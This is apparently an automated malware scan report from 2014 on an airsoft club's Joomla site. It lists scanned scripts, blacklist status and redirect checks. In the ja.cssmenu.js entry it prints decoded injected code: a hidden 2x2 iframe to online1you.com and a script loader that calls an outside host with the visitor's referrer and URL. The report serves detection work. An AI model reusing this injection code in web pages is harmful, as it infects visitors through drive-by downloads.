Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bundesheer-airsoft.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bundesheer-airsoft.org/ | 200 OK Content-Length: 28490 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/media/system/js/caption.js | 200 OK Content-Length: 3735 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/players/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/players/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24010 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/players/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8527 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/jw_allvideos.js | 200 OK Content-Length: 6770 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 4793 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var siteurl = ''; function fixIEPNG(el, bgimgdf, sizingMethod, type, offset){ var objs = el; if(!objs) return; if ($type(objs) != 'array') objs = [objs]; if(!sizingMethod) sizingMethod = 'crop'; if(!offset) offset = 0; var blankimg = siteurl + 'images/blank.png'; objs.each(function(obj) { var bgimg = bgimgdf; if (obj.tagName == 'IMG') { if (!bgimg) bgimg = obj.src; if (!(/\.png$/i).test(bgimg) || (/blank\.png$/i).test(bgimg)) re Antivirus reports:
| ||
http://bundesheer-airsoft.org/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 3281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JA_Collapse_Mod = new Class({ initialize: function(myElements) { options = Object.extend({ transition: Fx.Transitions.quadOut }, {}); this.myElements = myElements; var exModules = excludeModules.split(','); exModules.each(function(el,i){exModules[i]='Mod'+el}); myElements.each(function(el, i){ el.elmain = $E('.jamod-content',el); el.titleEl = $E('h3',el); if(!el.titleEl) return; if (exModules.contains(el.id)) { Antivirus reports:
| ||
http://bundesheer-airsoft.org/templates/ja_purity/js/ja.cssmenu.js | 200 OK Content-Length: 2164 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: online1you.com sfHover = function() { var sfEls = document.getElementById("ja-mainnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf(" sfhover") == -1) this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHo ...[1827 bytes skipped]... Decoded script: ...[69 bytes skipped]... innav").getElementsByTagName("li"); for (var i = 0; i < sfEls.length; ++i) { sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf(" sfhover") == -1) {this.className += " sfhover";}}; sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);}; } } var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescap ...[614 bytes skipped]... | ||
http://bundesheer-airsoft.org/index.php | 200 OK Content-Length: 31204 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/modules/mod_swmenufree/transmenu_Packed.js | 404 Not Found Content-Length: 328 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/modules/mod_swmenufree/jquery-1.2.6.pack.js | 200 OK Content-Length: 73758 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] Antivirus reports:
| ||
http://bundesheer-airsoft.org/index.php?option=com_content&view=category&layout=blog&id=8&Itemid=1 | 200 OK Content-Length: 29206 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/index.php?option=com_content&view=article&id=9&Itemid=14 | 200 OK Content-Length: 20288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 21:03:11 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Fedora)
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 21:03:11 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 090874703c6fa430214ebe483f9b987d=0i3g9p7m3erkrlp4m1pbf603p3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 24-May-2015 21:03:11 GMT; path=/
X-Powered-By: PHP/5.3.14
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 21:03:11 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Fedora)
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 21:03:11 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 090874703c6fa430214ebe483f9b987d=0i3g9p7m3erkrlp4m1pbf603p3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 24-May-2015 21:03:11 GMT; path=/
X-Powered-By: PHP/5.3.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Referer: http://www.google.com/search?q=bundesheer-airsoft.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Referer: http://www.google.com/search?q=bundesheer-airsoft.org
Result:
The result is similar to the first query. There are no suspicious redirects found.